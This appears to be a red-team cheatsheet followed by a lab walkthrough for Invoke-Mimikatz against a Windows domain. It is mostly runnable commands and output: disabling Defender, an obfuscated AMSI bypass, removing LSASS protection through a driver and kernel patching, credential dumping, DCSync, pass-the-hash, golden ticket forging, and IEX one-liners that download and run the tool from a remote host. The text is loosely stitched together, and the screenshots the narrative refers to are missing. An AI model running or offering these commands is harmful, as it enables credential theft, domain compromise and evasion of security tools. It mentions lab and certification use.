Invoke-Mimikatz
Today we are going to be looking at Invoke-Mimikatz which can be found here:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
I think I have solved it. " Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
Change the following line:
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
To
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
This solves the issue with Win11
.
1. Preparation and Environment Setup
Run PowerShell as Administrator and prepare your environment:
Start-Process PowerShell_ISE -Verb RunAs
Add-MpPreference -ExclusionPath "C:\Temp"
Set-MpPreference -DisableRealtimeMonitoring $true
Import-Module C:\Temp\Invoke-Mimikatz.ps1
If Defender can’t be turned off, use AMSI bypass:
S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )
2. Bypass LSA Protection (if necessary)
If Mimikatz throws:
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
Try this:
Loading the mimidrv Driver into Memory
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service startedmimikatz #
Removing the LSA Protection
mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 528 -> 00/00 [0-0-0]
3. Dumping Credentials (Basic)
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
evil-winrm-py PS C:\programdata> Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"' .#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14 .## ^ ##. "A La Vie, A L'Amour" ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 20 modules * * */ mimikatz(powershell) # token::elevate Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM 584 38654 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary -> Impersonated ! * Process Token : 14772731 OFFICE\Administrator S-1-5-21-1199398058-4196589450-691661856-500 (16g,26p) Primary * Thread Token : 27018955 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation) mimikatz(powershell) # privilege::debug Privilege '20' OK
Check Credential Manager:
Invoke-Mimikatz -Command '"vault::cred /patch"'
Invoke-Mimikatz -Command '"sekurlsa::credman"'
Other modules:
Invoke-Mimikatz -Command '"lsadump::sam"'
Invoke-Mimikatz -Command '"lsadump::cache"'
4. Pass-The-Hash (PTH)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:corp.local /ntlm:<NTLM_HASH> /run:powershell_ise.exe"'
5. Pass-The-Ticket (PTT)
Export tickets:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Inject ticket:
Invoke-Mimikatz -Command '"kerberos::ptt .\ticket.kirbi"'
View or clear tickets:
klist
klist purge
6. Remote Credential Dumping
Invoke-Command –ScriptBlock {Set-MpPreference –DisableRealtimeMonitoring $true} –ComputerName TargetHost
Invoke-Mimikatz -DumpCreds -ComputerName TargetHost
7. DCSync Attack
Dump krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:corp\\krbtgt"'
Dump all domain hashes:
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /domain:test.local /all /csv"' | Export-Csv .\AllHashes.csv
8. Golden Ticket Forging
Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:S-1-5-21-XXXX /krbtgt:<hash> /user:Administrator /id:500 /ptt"'
To save and reuse the ticket later:
kerberos::golden /ticket:golden.kirbi
kerberos::ptt golden.kirbi
9. Trust Escalation via Golden Ticket
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:child.local /sid:<child_sid> /sids:<parent_sid>-519 /krbtgt:<hash> /ticket:trust_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt trust_tkt.kirbi"'
10. MiniDump LSASS Without Touching LSASS Directly
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full
Then in Mimikatz:
sekurlsa::minidump C:\Temp\lsass.dmp
sekurlsa::logonpasswords
11. Check LSA Protection Status
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
If the value is 0x1, protection is enabled.
12. Obfuscated Invoke-Mimikatz for AV Evasion
Download and run:
IEX (New-Object Net.WebClient).DownloadString('http://<yourhost>/Invoke-Mimikatz.ps1')
Then call commands in obfuscated way:
Invoke-Mimikatz -Command ([string]::Join(' ', @('"privilege::debug"', '"sekurlsa::logonpasswords"')))
13. Dump Credentials via Volume Shadow Copy
Create shadow copy:
wmic shadowcopy call create Volume='C:\'
Find available shadow copies:
vssadmin list shadows
Copy NTDS and SYSTEM:
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\ntds.dit" C:\Temp\ntds.dit
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\System32\config\SYSTEM" C:\Temp\SYSTEM
Parse using impacket:
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
14. Beyond Mimikatz: Tools Worth Knowing
- SafetyKatz — Obfuscated Mimikatz variant designed to bypass modern EDR solutions.
- Rubeus →Powerful Kerberos abuse toolkit for ticket extraction, overpass-the-hash, and more.
- PEASS-ng →Comprehensive privilege escalation enumeration suite (WinPEAS & LinPEAS).
- Seatbelt →Post-exploitation tool for situational awareness and system reconnaissance.
- Ligolo-ng →Advanced reverse tunneling tool useful for establishing SOCKS proxies and secure pivoting in red team operations
15. [Advanced] Understanding LSA Protection in Kernel
Sometimes when running Mimikatz to dump LSASS credentials, you may encounter the following error:
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
This typically happens because LSASS is protected using a mechanism called LSA Protection, which prevents even local administrators from accessing LSASS memory directly.
Why This Happens
At the kernel level, each process in Windows has a structure called EPROCESS, and inside it there is a field named Protection. This field defines the Protection Level of the process (such as “Protected Process” or “Protected Light”).
LSASS typically runs as a Protected Process Light (PPL), which is why Mimikatz — unless running with elevated, trusted context — gets denied access.
How to Remove LSA Protection (Kernel-Level)
If you have access to a kernel debugger (e.g., WinDbg), you can manually remove this protection:
Get LSASS EPROCESS structure:
Run the following in WinDbg:
!process 0 0 lsass.exe
Note the address of the LSASS
EPROCESS.
View protection level:
Run:
dt nt!_EPROCESS <lsass_eprocess_address> Protection
Patch the protection field:
Overwrite the protection byte with:
eb <lsass_eprocess_address + offset> 0x00
Get the structure of PS_PROTECTION to understand what the byte represents:
Run:
dt nt!_PS_PROTECTION
After this, Mimikatz should be able to access LSASS and dump credentials normally.
Final Notes
- Always run with highest possible privileges (Administrator or SYSTEM)
- Avoid touching LSASS directly unless needed — prefer DCSync or VSS
- Test everything in a lab before using in real assessments
- Use logging, OPSEC, and live off the land when possible
Thanks for reading. This cheatsheet is the result of multiple real-world labs, including CRTP and AD-focused simulations. It’s designed to be minimal, actionable, and practical.
For this lab we will be using a Domain Controller and also a Windows 10 machine that is part of the domain. Both have Windows Defender and Real Time Protection turned on.
If we did want to Disable Defender we run PS> Set-MpPreference -DisableIOAVProtection $true
We will start as an administrator on the Windows 10 machine, this is not a privilege escalation walkthrough, just a quick showing of Invoke-Mimikatz.ps1.
As stated we will start off with administrator access on the Windows 10 machine. Also notice that this is a local administrator, not a domain administrator.
load invoke-mimikatz.ps1 into memory with : iex (iwr -UseBasicParsing http://10.10.14.5/Invoke-Mimikatz.ps1)
evil-winrm-py PS C:\Users\Administrator\Documents> iex (iwr -UseBasicParsing http://10.10.14.5/Invoke-Mimikatz.ps1) evil-winrm-py PS C:\Users\Administrator\Documents> invoke-mimikatz .#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14 .## ^ ##. "A La Vie, A L'Amour" ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 20 modules * * */ mimikatz(powershell) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list mimikatz(powershell) # exit Bye! evil-winrm-py PS C:\Users\Administrator\Documents>
The first thing we can run is token::elevate:
Now that we have put mimikatz into memory we can start to look at some of the different commands. Lets start off with just Invoke-Mimikatz:
Now lets only look at the LSA dump, we will be utilizing 2 commands strung together for this, we will look at both LSA dump and also LSA dump patch. To do this we can run Invoke-Mimikatz -command ‘“lsadump::lsa” “lsadump::lsa /patch”’.
Notice when we do this both commands are ran, we can continue to string more commands together if we please. Next lets look at the vault. To do this we will be utilizing the vault::list, vault::cred and vault::cred /patch.
Notice above there is not anything in the vault that we can utilize. That is ok, we still have plenty of information from the other commands that we used to work with. Also thinking back at the last commands that we ran, we could do a token::elevate with each command if we so please, and string other commands with it.
Now that we have done a few commands and saw that we can string commands together lets utilize the information that we have above to do a pass the hash with invoke-mimikatz.
The command above will open a new PowerShell window, and we can see if we have successfully passed the hash by looking at the domain controller.
Awesome, we are now utilizing pass the hash and are an administrator on the Domain Controller, easy day. If you are confused about the domain name or computer name, we have found this information before with mimikatz and the commands we have already ran:
Notice the logon server is the computer name of the Domain Controller and the domain is the domain name.
Continuing on lets try and create a golden ticket:
Awesome it worked, but we were on the DC already, lets create one for the the Windows 10 machine and then see if we can login with the ticket that we created:
Awesome we were able to create another session with a golden ticket utilizing the Windows 10 Machine and the information that we found on the DC. We have now created persistence within the domain.
As shown throughout this article we can utilize Invoke-Mimikatz.ps1 the same way we can run mimikatz.exe, however with the ps1 we can put it into memory, thus helping with bypassing Defender and Real Time Monitoring.